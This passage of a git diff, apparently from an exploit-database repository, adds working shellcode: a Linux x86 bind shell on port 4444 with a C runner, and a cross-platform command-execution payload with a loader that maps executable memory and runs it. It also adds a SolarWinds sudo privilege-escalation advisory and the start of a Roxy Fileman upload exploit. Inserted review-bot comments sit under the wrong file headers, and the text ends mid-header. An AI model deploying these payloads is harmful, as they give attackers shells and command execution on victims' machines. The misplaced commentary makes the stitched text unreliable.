+ push eax ; PUSH 00000000 (NULL byte)
+ mov al, 0xb ; EXECVE(2)
+ push 0x68732f2f ; "//sh"
+ push 0x6e69622f ; "/bin"
+
+ xchg esp, ebx ; Save a byte by sacrificing unneeded ESP
+
+ int 0x80 ; Start /bin/sh in the client socket FD
+*/
+
+/*===================================================================*/
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/39851.c b/platforms/lin_x86/shellcode/39851.c
new file mode 100755
index 000000000..62f0d3aa7
--- /dev/null
+++ b/platforms/lin_x86/shellcode/39851.c
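Review bot: `shellcode_setport` takes the buffer to patch as `buf` but performs its null-byte check on the global `shellcode` (`if (shellcode[20] == '\x00' || shellcode[21] == '\x00')`), so when it is called with any other buffer the check inspects the wrong array; it should read `if (buf[shellcode_port_offset] == '\x00' || buf[shellcode_port_offset+1] == '\x00')`. In `main`, `printf("Shellcode Length: %d\n", strlen(shellcode))` passes a `size_t` to `%d` (use `%zu`), and `main ()` has an implicit `int` return type. In `shellcode_zerocheck`, `int i` is compared against `sizeof(shellcode)-1`, a signed/unsigned comparison that `size_t i` would avoid. The three `#include` lines are empty as rendered here, so the file does not compile as shown.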
@@ -0,0 +1,278 @@
+// Title: Linux X86 Bind TCP:4444 (656 bytes)
+// Author: Brandon Dennis
+// Contact: bdennis@mail.hodges.edu
+// Date: 5/24/2016
+// ASM Source: https://github.com/slyth11907/x86-ASM-Linux-Intel/blob/master/Code-Examples/ShellCode/execve-stack-bind.asm
+
+/*
+; Filename: execve-stack-bind.asm
+; Author: Brandon Dennis
+; Date: 5/24/2016
+
+; execve
+; execve takes 3 arguments
+; 1: filename: EX /bin/bash, 0x0
+; 2: arguments for the executable(1st arg should be the filename then 2nd arg should be null or 0x0000)
+; 3: envp is used for env settings, we can leave this as null: EX 0x0000
+
+; Python code to get the instruction in HEX of the string reversed to place into the stack
+; python -c 'string="//etc/shadow";splitNum=8;print "\nLength: %s" % len(string[::-1]);string=string[::-1].encode("hex"); \
+; string=["push 0x"+str(string[i:i+splitNum]) for i in range(0, len(string), splitNum)]; \
+; print "Hex List:\n"; print("\n".join(h for h in string))'
+
+
+; Port: 4444 (\x5c\x11) in shellcode
+; ShellCode---
+; "\x31\xc0\x50\x66\xb8\x66\x00\x31\xdb\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80
+; \x89\xc2\x31\xc0\x66\xb8\x66\x00\x31\xdb\xb3\x14\x6a\x04\x54\x6a\x02\x6a\x01
+; \x52\x89\xe1\xcd\x80\x31\xc0\x66\xb8\x66\x00\x31\xdb\x53\xb3\x02\x66\x68\x11
+; \x5c\x66\x6a\x02\x89\xe1\x6a\x16\x51\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53
+; \x66\xb8\x66\x00\xb3\x04\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53\x53\x66\xb8
+; \x66\x00\xb3\x05\x52\x89\xe1\xcd\x80\x89\xc2\x31\xc0\x31\xc9\xb0\x3f\x89\xd3
+; \xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd
+; \x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f
+; \x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
+; ShellCode---
+; Bytes: 656
+; Tested on: Linux 3.13.0-32, Ubuntu 12.04.5 LTS, X86
+
+
+global _start
+
+section .text
+
+_start:
+
+
+ ; Create the socket FD
+ ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+ xor eax, eax
+ push eax ; this is for our first arg as 
it is needing be be 0 for IPPROTO_IP
+ mov ax, 102 ; moves syscall for socketcall into ax
+ xor ebx, ebx ; 0's out ebx
+ mov bl, 0x1 ; setting the socketcall type to sys_socket
+ push 0x1 ; we now pass 1 onto the stack for SOCK_STREAM
+ push 0x2 ; we now pass 2 onto the stack for AF_INET
+ mov ecx, esp; this moves the memory location of our args to ecx
+ int 0x80 ; execute the syscall socketcall
+ mov edx, eax ; This allows us to save the FD from the socket
+
+ ; This avoids SIGSEGV when trying to reconnect
+ ; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &socklen_t, socklen_t)
+
+ xor eax, eax; 0's our eax
+ mov ax, 102; moves syscall for socketcall into ax
+ xor ebx, ebx; 0's out ebx
+ mov bl, 0x14; moves the sys_setsocketopt as param 1
+
+ push 0x4; push the sizeof onto the stack
+ push esp; now we push the memory location of param 1(sizeof) onto the stack
+ push 0x2; we now set the SO_REUSEADDR onto the stack
+ push 0x1; we now set the SOL_SOCKET onto the stack
+ push edx; this pushes our previous socket FD onto the stack
+ mov ecx, esp; this pushes the memory location of our args into ecx
+ int 0x80; execute the syscall socketcall
+
+
+ ; We now setup the bind
+ ; bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16)
+ xor eax, eax; 0's out eax
+ mov ax, 102; moves syscall for socketcall into ax
+ xor ebx, ebx; 0's out ebx
+ push ebx; this pushes 0 onto the stack for our first arg of INADDR_ANY for our local host
+ mov bl, 0x2; set the socketcall type to sys_bind
+ push WORD 0x5c11; we now set the port to bind on, in reverse order is 4444
+ push WORD 0x2; we now push the arg AF_INET onto the stack
+ mov ecx, esp; we now grab our memeory location to our args
+ push 0x16; we now set the sockaddr size onto the stack
+ push ecx; we now push our memory location of our previous args onto the stack
+ push edx; we push our current socket FD onto the stack
+ mov ecx, esp; we now get our new socket FD
+ int 0x80; execute the syscall socketcall
+
+
+ ; We now need to setup a 
passive socket to wait for the new connection
+ ; listen(sockfd, 0);
+ xor eax, eax; 0's our eax
+ xor ebx, ebx; 0's out ebx
+ push ebx; this pushes our 2nd arg for connection que size to 0
+ mov ax, 102; moves syscall for socketcall into ax
+ mov bl, 0x4; we now set the socketcall type to sys_listen
+ push edx; we now push our socket FD onto the stack
+ mov ecx, esp; we now move the memory location of our args list into ecx
+ int 0x80; execute the syscall for socketcall with the listen type
+
+ ; We now accept the connection when it comes in
+ ; accept(sockfd, NULL, NULL)
+
+ xor eax, eax; 0's our eax
+ xor ebx, ebx; 0's out ebx
+ push ebx; we add these 2 0's since we dont need information on the client connecting to us
+ push ebx
+ mov ax, 102; moves syscall for socketcall int ax
+ mov bl, 0x5; we set the socketcall type to sys_accept
+ push edx; we push our Socket FD onto the stack
+ mov ecx, esp; we grab the memeory location of our args and move it to ecx
+ int 0x80; execute the syscall socketcall
+ mov edx, eax; this saves the Socket FD for the client
+
+
+ ; We can now use dup2 to create all 3 of our std's, in/out/err so that our shellhas access to it over the socket
+ ; dup2(clientfd)
+ xor eax, eax; 0's out eax
+ xor ecx, ecx; 0's out ecx since our first std FD is in so its 0
+ mov al, 63; we now move the syscall for dup2 into al
+ mov ebx, edx; we now move the client socket FD into ebx
+ int 0x80; execute the dup2 syscall
+
+ xor eax, eax; 0's out the eax reg due to any return's happening
+ xor ecx, ecx; 0's out ecx
+ mov al, 63; this is the syscall for dup2
+ mov cl, 0x1; we now set cl to the FD of stdout
+ int 0x80; execut the dup2 syscall
+
+ xor eax, eax; 0's out eax
+ mov al, 63; moves the dup2 syscall
+ mov cl, 0x2; we now set cl to the stderr FD
+ int 0x80; execute the dup2 syscall
+
+
+ ; We can now execute our shell in /bin/bash
+
+ xor eax, eax ; we first need our nulls
+ push eax ; this will push a drowd of nulls onto the stack
+
+
+ ; this 
section of pushes are the string ////bin/bash from our pyhton 1 liner above + push 0x68736162 + push 0x2f6e6962 + push 0x2f2f2f2f + + mov ebx, esp ; this moves the memory address of esp(pointing to our string & nulls) + ; from the stack into ebx where execve is expecting the name of the application + a null + push eax ; this pushes another null onto the stack + mov edx, esp ; this now gets the memory address of the nulls we just pushed onto the stack into edx, this is for envp so it can just be null + push ebx ; this pushes the memory address of our string onto the stack + mov ecx, esp ; this moves the address of our string from the stack to ecx + mov al, 0xb ; this will load the syscall # 11 + int 0x80 ; execute the system call +*/ + +// Python code to get the instruction in HEX of the string reversed to place into the stack +// python -c 'string="//etc/shadow";splitNum=8;print "\nLength: %s" % len(string[::-1]);string=string[::-1].encode("hex"); \ +// string=["push 0x"+str(string[i:i+splitNum]) for i in range(0, len(string), splitNum)]; \ +// print "Hex List:\n"; print("\n".join(h for h in string))' + + +// Port: 4444 (\x5c\x11) in shellcode +// ShellCode--- +// Bytes: 656 +// Tested on: Linux 3.13.0-32, Ubuntu 12.04.5 LTS, X86 + +//------------- OBJDUMP ------------- +//execve-stack-bind: file format elf32-i386 + +//Disassembly of section .text: +//8048060 <_start>: + //8048060: 31 c0 xor eax,eax + //8048062: 50 push eax + //8048063: 66 b8 66 00 mov ax,0x66 + //8048067: 31 db xor ebx,ebx + //8048069: b3 01 mov bl,0x1 + //804806b: 6a 01 push 0x1 + //804806d: 6a 02 push 0x2 + //804806f: 89 e1 mov ecx,esp + //8048071: cd 80 int 0x80 + //8048073: 89 c2 mov edx,eax + //8048075: 31 c0 xor eax,eax + //8048077: 66 b8 66 00 mov ax,0x66 + //804807b: 31 db xor ebx,ebx + //804807d: b3 14 mov bl,0x14 + //804807f: 6a 04 push 0x4 + //8048081: 54 push esp + //8048082: 6a 02 push 0x2 + //8048084: 6a 01 push 0x1 + //8048086: 52 push edx + //8048087: 89 e1 mov ecx,esp + //8048089: 
cd 80 int 0x80
+ //804808b: 31 c0 xor eax,eax
+ //804808d: 66 b8 66 00 mov ax,0x66
+ //8048091: 31 db xor ebx,ebx
+ //8048093: 53 push ebx
+ //8048094: b3 02 mov bl,0x2
+ //8048096: 66 68 11 5c pushw 0x5c11
+ //804809a: 66 6a 02 pushw 0x2
+ //804809d: 89 e1 mov ecx,esp
+ //804809f: 6a 16 push 0x16
+ //80480a1: 51 push ecx
+ //80480a2: 52 push edx
+ //80480a3: 89 e1 mov ecx,esp
+ //80480a5: cd 80 int 0x80
+ //80480a7: 31 c0 xor eax,eax
+ //80480a9: 31 db xor ebx,ebx
+ //80480ab: 53 push ebx
+ //80480ac: 66 b8 66 00 mov ax,0x66
+ //80480b0: b3 04 mov bl,0x4
+ //80480b2: 52 push edx
+ //80480b3: 89 e1 mov ecx,esp
+ //80480b5: cd 80 int 0x80
+ //80480b7: 31 c0 xor eax,eax
+ //80480b9: 31 db xor ebx,ebx
+ //80480bb: 53 push ebx
+ //80480bc: 53 push ebx
+ //80480bd: 66 b8 66 00 mov ax,0x66
+ //80480c1: b3 05 mov bl,0x5
+ //80480c3: 52 push edx
+ //80480c4: 89 e1 mov ecx,esp
+ //80480c6: cd 80 int 0x80
+ //80480c8: 89 c2 mov edx,eax
+ //80480ca: 31 c0 xor eax,eax
+ //80480cc: 31 c9 xor ecx,ecx
+ //80480ce: b0 3f mov al,0x3f
+ //80480d0: 89 d3 mov ebx,edx
+ //80480d2: cd 80 int 0x80
+ //80480d4: 31 c0 xor eax,eax
+ //80480d6: 31 c9 xor ecx,ecx
+ //80480d8: b0 3f mov al,0x3f
+ //80480da: b1 01 mov cl,0x1
+ //80480dc: cd 80 int 0x80
+ //80480de: 31 c0 xor eax,eax
+ //80480e0: b0 3f mov al,0x3f
+ //80480e2: b1 02 mov cl,0x2
+ //80480e4: cd 80 int 0x80
+ //80480e6: 31 c0 xor eax,eax
+ //80480e8: 50 push eax
+ //80480e9: 68 62 61 73 68 push 0x68736162
+ //80480ee: 68 62 69 6e 2f push 0x2f6e6962
+ //80480f3: 68 2f 2f 2f 2f push 0x2f2f2f2f
+ //80480f8: 89 e3 mov ebx,esp
+ //80480fa: 50 push eax
+ //80480fb: 89 e2 mov edx,esp
+ //80480fd: 53 push ebx
+ //80480fe: 89 e1 mov ecx,esp
+ //8048100: b0 0b mov al,0xb
+ //8048102: cd 80 int 0x80
+//------------- OBJDUMP -------------
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xc0\x50\x66\xb8\x66\x00\x31\xdb\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
+"\x89\xc2\x31\xc0\x66\xb8\x66\x00\x31\xdb\xb3\x14\x6a\x04\x54\x6a\x02\x6a\x01"
+"\x52\x89\xe1\xcd\x80\x31\xc0\x66\xb8\x66\x00\x31\xdb\x53\xb3\x02\x66\x68"
+"\x11\x5c" //<----PORT #4444
+"\x66\x6a\x02\x89\xe1\x6a\x16\x51\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53"
+"\x66\xb8\x66\x00\xb3\x04\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53\x53\x66\xb8"
+"\x66\x00\xb3\x05\x52\x89\xe1\xcd\x80\x89\xc2\x31\xc0\x31\xc9\xb0\x3f\x89\xd3"
+"\xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd"
+"\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f"
+"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}
diff --git a/platforms/linux/local/39967.txt b/platforms/linux/local/39967.txt
new file mode 100755
index 000000000..9c008fe6d
--- /dev/null
+++ b/platforms/linux/local/39967.txt
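Review bot: The "656 bytes" in the title, the `; Bytes: 656` comment and the files.csv row count the characters of the escaped string, not the payload: `code[]` holds 164 bytes (the objdump above runs from 0x8048060 to the 2-byte instruction at 0x8048102, i.e. 0xa4 = 164 bytes), so the size is overstated fourfold. The array also contains `\x00` bytes (`mov ax,0x66` encodes as `66 b8 66 00`), so `printf("Shellcode Length: %d\n", strlen(code))` in `main` stops at the first null and prints 6; `(int)(sizeof(code) - 1)` gives the real length, as the sibling 39578.c already does. In the bind section, `push 0x16` pushes 22 for the address length while the pseudo-call comment says `bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16)` — the immediate looks like a decimal/hex mix-up (0x10 is 16) and the comment's port 11111 disagrees with the `0x5c11` (4444) actually pushed. The two `#include` lines are empty as rendered and `main()` has no explicit return type.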
@@ -0,0 +1,51 @@
+Product: Solarwinds Virtualization Manager
+
+Vendor: Solarwinds
+Vulnerable Version(s): < 6.3.1
+Tested Version: 6.3.1
+
+Vendor Notification: April 25th, 2016
+Vendor Patch Availability to Customers: June 1st, 2016
+Public Disclosure: June 14th, 2016
+
+Vulnerability Type: Security Misconfiguration
+CVE Reference: CVE-2016-3643
+Risk Level: High
+CVSSv2 Base Score: 7.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:W/RC:C/CR:M/IR:M/AR:M/MAV:L/MAC:L/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:H)
+Solution Status: Solution Available
+
+Discovered and Provided: Nate Kettlewell, Depth Security ( https://www.depthsecurity.com/ )
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+Depth Security discovered a vulnerability in Solarwinds Virtualization Manager appliance.
+This attack requires a user to have an operating system shell on the vulnerable appliance.
+
+1) Misconfiguration of sudo in Solarwinds Virtualization Manager: CVE-2016-3643
+
+The vulnerability exists due to the miconfiguration of sudo in that it allows any local user to use sudo to execute commands as the superuser.
+A local attacker can obtain root privileges to the operating system regardless of privilege level.
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Solarwinds has released a hotfix to remediate this vulnerability on existing installations.
+
+This flaw as well as several others have been corrected and that release has been put into manufacturing for new appliances.
+
+-----------------------------------------------------------------------------------------------
+
+Proof of Concept:
+
+The following is an example of the commands necessary for a low-privileged user to dump the contents of the "/etc/shadow" file by using sudo.
+
+sudo cat /etc/passwd
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] Solarwinds Virtualization Manager- http://www.solarwinds.com/virtualization-manager - Solarwinds Virtualization Manager provides monitoring and remediation for virtualized environments.
\ No newline at end of file
diff --git a/platforms/multiple/shellcode/39885.c b/platforms/multiple/shellcode/39885.c
new file mode 100755
index 000000000..425da60cf
--- /dev/null
+++ b/platforms/multiple/shellcode/39885.c
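Review bot: The proof-of-concept prose and the command it introduces disagree: the sentence announces reading "/etc/shadow", while the command shown is `sudo cat /etc/passwd`, a world-readable file that demonstrates nothing about the sudo misconfiguration, so the two should name the same file. The score line is labelled "CVSSv2 Base Score" but carries a CVSS:3.0 vector string; one of the two labels is wrong. The Solution section names a hotfix without an identifier or a way for an operator to verify the corrected sudoers policy on a patched appliance, which is the detail defenders acting on this advisory need most.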
@@ -0,0 +1,401 @@ +/** + # Title : Execute command on Linux/Windows/BSD x86_64 execve("/bin//sh", {"//bin/sh", "-c", "cmd"}, NULL) shellcode + # Date : 04-06-2016 + # Author : @odzhancode + # Tested On : Debian x86/x64, FreeBSD x64, OpenBSD x64, Windows x86, Windows x64 +*/ + +; ************************************** +; exec.asm +; +; Execute a command +; Works on 32/64-bit versions of Windows and Linux, 64-bit versions of FreeBSD/OpenBSD +; +; yasm -fbin exec.asm -oexec.bin +; nasm -fbin exec.asm -oexec.bin +; +; 194 bytes +; + bits 32 + + push esi + push edi + push ebx + push ebp + + xor ecx, ecx ; ecx=0 + mul ecx ; eax=0, edx=0 + + push eax + push eax + push eax + push eax + push eax ; setup homespace for win64 + jmp l_sb ; load command + +get_os: + pop edi ; edi=cmd, argv + mov cl, 7 + ; initialize cmd/argv regardless of OS + push eax ; argv[3]=NULL; + push edi ; argv[2]=cmd + repnz scasb ; skip command line + stosb ; zero terminate + push edi ; argv[1]="-c", 0 + scasw ; skip option + stosb ; zero terminate + push edi ; argv[0]="/bin//sh", 0 + push esp ; save argv + push edi ; save pointer to "/bin//sh", 0 + + mov al, 6 ; eax=sys_close for Linux/BSD + inc ecx ; ignored on x64 + jecxz gos_x64 ; if ecx==0 we're 64-bit + + ; we're 32-bit + ; if gs is zero, we're native 32-bit windows + mov cx, gs + jecxz win_cmd + + ; if eax is zero after right shift of SP, ASSUME we're on windows + push esp + pop eax + shr eax, 24 + jz win_cmd + + ; we're 32-bit Linux + mov al, 11 ; eax=sys_execve + pop ebx ; ebx="/bin//sh", 0 + pop ecx ; ecx=argv + int 0x80 + + ; we're 64-bit, execute syscall and see what + ; error returned +gos_x64: + push -1 + pop edi + syscall + cmp al, 5 ; Access Violation indicates windows + push 59 + pop eax + cdq + jz win_cmd + + pop edi ; rdi="/bin//sh", 0 + pop esi ; rsi=argv + syscall +l_sb: + jmp ld_cmd + ; following code is derived from Peter Ferrie's calc shellcode + ; i've modified it to execute commands +win_cmd: + pop eax ; eax="/bin//sh", 0 + 
pop eax ; eax=argv + pop eax ; eax="/bin//sh", 0 + pop eax ; eax="-c", 0 + pop ecx ; ecx=cmd + pop eax ; eax=0 + + inc eax + xchg edx, eax + jz x64 + + push eax ; will hide + push ecx ; cmd + + mov esi, [fs:edx+2fh] + mov esi, [esi+0ch] + mov esi, [esi+0ch] + lodsd + mov esi, [eax] + mov edi, [esi+18h] + mov dl, 50h + jmp lqe + bits 64 +x64: + mov dl, 60h + mov rsi, [gs:rdx] + mov rsi, [rsi+18h] + mov rsi, [rsi+10h] + lodsq + mov rsi, [rax] + mov rdi, [rsi+30h] +lqe: + add edx, [rdi+3ch] + mov ebx, [rdi+rdx+28h] + mov esi, [rdi+rbx+20h] + add rsi, rdi + mov edx, [rdi+rbx+24h] +fwe: + movzx ebp, word [rdi+rdx] + lea rdx, [rdx+2] + lodsd + cmp dword [rdi+rax], 'WinE' + jne fwe + + mov esi, [rdi+rbx+1ch] + add rsi, rdi + + mov esi, [rsi+rbp*4] + add rdi, rsi + cdq + call rdi +cmd_end: + bits 32 + pop eax + pop eax + pop eax + pop eax + pop eax + pop ebp + pop ebx + pop edi + pop esi + ret +ld_cmd: + call get_os + ; place command here + ;db "notepad", 0xFF + ; do not change anything below + ;db "-c", 0xFF, "/bin//sh", 0 + +// *************** xcmd.c + +/** + Copyright © 2016 Odzhan. All Rights Reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. The name of the author may not be used to endorse or promote products + derived from this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, + INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN + ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + POSSIBILITY OF SUCH DAMAGE. */ + +#include +#include +#include +#include + +#if defined (_WIN32) || defined(_WIN64) +#define WIN +#include +#else +#include +#endif + +#define CMD_LEN_OFS 0x10+1 +#define EXEC_SIZE 194 + +char exec[]= { + /* 0000 */ "\x56" /* push esi */ + /* 0001 */ "\x57" /* push edi */ + /* 0002 */ "\x53" /* push ebx */ + /* 0003 */ "\x55" /* push ebp */ + /* 0004 */ "\x31\xc9" /* xor ecx, ecx */ + /* 0006 */ "\xf7\xe1" /* mul ecx */ + /* 0008 */ "\x50" /* push eax */ + /* 0009 */ "\x50" /* push eax */ + /* 000A */ "\x50" /* push eax */ + /* 000B */ "\x50" /* push eax */ + /* 000C */ "\x50" /* push eax */ + /* 000D */ "\xeb\x37" /* jmp 0x46 */ + /* 000F */ "\x5f" /* pop edi */ + /* 0010 */ "\xb1\x00" /* mov cl, 0x0 */ + /* 0012 */ "\x50" /* push eax */ + /* 0013 */ "\x57" /* push edi */ + /* 0014 */ "\xf2\xae" /* repne scasb */ + /* 0016 */ "\xaa" /* stosb */ + /* 0017 */ "\x57" /* push edi */ + /* 0018 */ "\x66\xaf" /* scasw */ + /* 001A */ "\xaa" /* stosb */ + /* 001B */ "\x57" /* push edi */ + /* 001C */ "\x54" /* push esp */ + /* 001D */ "\x57" /* push edi */ + /* 001E */ "\xb0\x06" /* mov al, 0x6 */ + /* 0020 */ "\x41" /* inc ecx */ + /* 0021 */ "\xe3\x12" /* jecxz 0x35 */ + /* 0023 */ "\x66\x8c\xe9" /* mov cx, gs */ + /* 0026 */ "\xe3\x20" /* jecxz 0x48 */ + /* 0028 */ "\x54" /* push esp */ + /* 0029 */ "\x58" /* pop eax */ + /* 002A */ "\xc1\xe8\x18" /* shr eax, 0x18 */ + /* 002D */ "\x74\x19" /* jz 0x48 */ + /* 002F */ "\xb0\x0b" /* mov al, 0xb */ + /* 0031 */ "\x5b" /* pop 
ebx */ + /* 0032 */ "\x59" /* pop ecx */ + /* 0033 */ "\xcd\x80" /* int 0x80 */ + /* 0035 */ "\x6a\xff" /* push 0xffffffff */ + /* 0037 */ "\x5f" /* pop edi */ + /* 0038 */ "\x0f\x05" /* syscall */ + /* 003A */ "\x3c\x05" /* cmp al, 0x5 */ + /* 003C */ "\x6a\x3b" /* push 0x3b */ + /* 003E */ "\x58" /* pop eax */ + /* 003F */ "\x99" /* cdq */ + /* 0040 */ "\x74\x06" /* jz 0x48 */ + /* 0042 */ "\x5f" /* pop edi */ + /* 0043 */ "\x5e" /* pop esi */ + /* 0044 */ "\x0f\x05" /* syscall */ + /* 0046 */ "\xeb\x75" /* jmp 0xbd */ + /* 0048 */ "\x58" /* pop eax */ + /* 0049 */ "\x58" /* pop eax */ + /* 004A */ "\x58" /* pop eax */ + /* 004B */ "\x58" /* pop eax */ + /* 004C */ "\x59" /* pop ecx */ + /* 004D */ "\x58" /* pop eax */ + /* 004E */ "\x40" /* inc eax */ + /* 004F */ "\x92" /* xchg edx, eax */ + /* 0050 */ "\x74\x16" /* jz 0x68 */ + /* 0052 */ "\x50" /* push eax */ + /* 0053 */ "\x51" /* push ecx */ + /* 0054 */ "\x64\x8b\x72\x2f" /* mov esi, [fs:edx+0x2f] */ + /* 0058 */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */ + /* 005B */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */ + /* 005E */ "\xad" /* lodsd */ + /* 005F */ "\x8b\x30" /* mov esi, [eax] */ + /* 0061 */ "\x8b\x7e\x18" /* mov edi, [esi+0x18] */ + /* 0064 */ "\xb2\x50" /* mov dl, 0x50 */ + /* 0066 */ "\xeb\x17" /* jmp 0x7f */ + /* 0068 */ "\xb2\x60" /* mov dl, 0x60 */ + /* 006A */ "\x65\x48" /* dec eax */ + /* 006C */ "\x8b\x32" /* mov esi, [edx] */ + /* 006E */ "\x48" /* dec eax */ + /* 006F */ "\x8b\x76\x18" /* mov esi, [esi+0x18] */ + /* 0072 */ "\x48" /* dec eax */ + /* 0073 */ "\x8b\x76\x10" /* mov esi, [esi+0x10] */ + /* 0076 */ "\x48" /* dec eax */ + /* 0077 */ "\xad" /* lodsd */ + /* 0078 */ "\x48" /* dec eax */ + /* 0079 */ "\x8b\x30" /* mov esi, [eax] */ + /* 007B */ "\x48" /* dec eax */ + /* 007C */ "\x8b\x7e\x30" /* mov edi, [esi+0x30] */ + /* 007F */ "\x03\x57\x3c" /* add edx, [edi+0x3c] */ + /* 0082 */ "\x8b\x5c\x17\x28" /* mov ebx, [edi+edx+0x28] */ + /* 0086 */ "\x8b\x74\x1f\x20" /* mov esi, 
[edi+ebx+0x20] */ + /* 008A */ "\x48" /* dec eax */ + /* 008B */ "\x01\xfe" /* add esi, edi */ + /* 008D */ "\x8b\x54\x1f\x24" /* mov edx, [edi+ebx+0x24] */ + /* 0091 */ "\x0f\xb7\x2c\x17" /* movzx ebp, word [edi+edx] */ + /* 0095 */ "\x48" /* dec eax */ + /* 0096 */ "\x8d\x52\x02" /* lea edx, [edx+0x2] */ + /* 0099 */ "\xad" /* lodsd */ + /* 009A */ "\x81\x3c\x07\x57\x69\x6e\x45" /* cmp dword [edi+eax], 0x456e6957 */ + /* 00A1 */ "\x75\xee" /* jnz 0x91 */ + /* 00A3 */ "\x8b\x74\x1f\x1c" /* mov esi, [edi+ebx+0x1c] */ + /* 00A7 */ "\x48" /* dec eax */ + /* 00A8 */ "\x01\xfe" /* add esi, edi */ + /* 00AA */ "\x8b\x34\xae" /* mov esi, [esi+ebp*4] */ + /* 00AD */ "\x48" /* dec eax */ + /* 00AE */ "\x01\xf7" /* add edi, esi */ + /* 00B0 */ "\x99" /* cdq */ + /* 00B1 */ "\xff\xd7" /* call edi */ + /* 00B3 */ "\x58" /* pop eax */ + /* 00B4 */ "\x58" /* pop eax */ + /* 00B5 */ "\x58" /* pop eax */ + /* 00B6 */ "\x58" /* pop eax */ + /* 00B7 */ "\x58" /* pop eax */ + /* 00B8 */ "\x5d" /* pop ebp */ + /* 00B9 */ "\x5b" /* pop ebx */ + /* 00BA */ "\x5f" /* pop edi */ + /* 00BB */ "\x5e" /* pop esi */ + /* 00BC */ "\xc3" /* ret */ + /* 00BD */ "\xe8\x4d\xff\xff\xff" /* call 0xf */ +}; + +// save code to binary file +void bin2file (uint8_t bin[], size_t len) +{ + FILE *out=fopen ("sh_cmd.bin", "wb"); + if (out!=NULL) + { + fwrite (bin, 1, len, out); + fclose (out); + } +} +// allocate read/write and executable memory +// copy data from code and execute +void xcode(void *code, size_t code_len, char *cmd, size_t cmd_len) +{ + void *bin; + uint8_t *p; + char args[]="\xFF-c\xFF/bin//sh\x00"; + size_t arg_len; + + arg_len=strlen(args) + 1; + + printf ("[ executing code...\n"); + +#ifdef WIN + bin=VirtualAlloc (0, code_len + cmd_len + arg_len, + MEM_COMMIT, PAGE_EXECUTE_READWRITE); +#else + bin=mmap (0, code_len + cmd_len + arg_len, + PROT_EXEC | PROT_WRITE | PROT_READ, + MAP_ANON | MAP_PRIVATE, -1, 0); +#endif + if (bin!=NULL) + { + p=(uint8_t*)bin; + + memcpy (p, code, code_len); + 
// set the cmd length + p[CMD_LEN_OFS] = (uint8_t)cmd_len; + // copy cmd + memcpy ((void*)&p[code_len], cmd, cmd_len); + // copy argv + memcpy ((void*)&p[code_len+cmd_len], args, arg_len); + + //DebugBreak(); + bin2file(bin, code_len+cmd_len+arg_len); + + // execute + ((void(*)())bin)(); + +#ifdef WIN + VirtualFree (bin, code_len+cmd_len+arg_len, MEM_RELEASE); +#else + munmap (bin, code_len+cmd_len+arg_len); +#endif + } +} + +int main(int argc, char *argv[]) +{ + size_t len; + char *cmd; + + if (argc != 2) { + printf ("\n usage: xcmd \n"); + return 0; + } + + cmd=argv[1]; + len=strlen(cmd); + + if (len==0 || len>255) { + printf ("\n invalid command length: %i (must be between 1 and 255)", len); + return 0; + } + + xcode(exec, EXEC_SIZE, cmd, len); + + return 0; +} diff --git a/platforms/php/webapps/39963.txt b/platforms/php/webapps/39963.txt new file mode 100755 index 000000000..05ee4f0a1 --- /dev/null +++ b/platforms/php/webapps/39963.txt @@ -0,0 +1,27 @@ +# Exploit Title: Roxy Fileman <= 1.4.4 Forbidden File Upload Vulnerability +# Google Dork: intitle:"Roxy file manager" +# Date: 15-06-2016 +# Exploit Author: Tyrell Sassen +# Vendor Homepage: http://www.roxyfileman.com/ +# Software Link: 